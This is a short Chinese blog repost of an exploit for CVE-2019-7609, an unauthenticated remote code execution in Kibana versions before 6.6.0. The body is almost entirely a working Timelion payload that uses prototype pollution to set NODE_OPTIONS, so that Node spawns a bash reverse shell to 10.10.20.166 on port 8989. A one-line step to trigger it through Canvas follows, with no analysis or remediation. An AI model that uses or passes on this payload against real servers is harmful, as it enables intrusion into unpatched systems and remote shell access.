最新消息:
    你的位置:jinglingshu的博客 > 渗透流程与思路 > kibana-RCE <6.6.0 未授权远程代码命令执行

    kibana-RCE <6.6.0 未授权远程代码命令执行

    渗透流程与思路 admin 11196浏览 0评论

    转自:https://github.com/jas502n/kibana-RCE

    CVE-2019-7609 kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)

    0x01 Timelion Run

    .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i &gt;&amp; /dev/tcp/10.10.20.166/8989 0&gt;&amp;1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

    0x02 Click Canvas to getshell

    转载请注明:jinglingshu的博客 » kibana-RCE <6.6.0 未授权远程代码命令执行

    与本文相关的文章

    发表我的评论
    取消评论

    表情

    Hi,您需要填写昵称和邮箱!

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址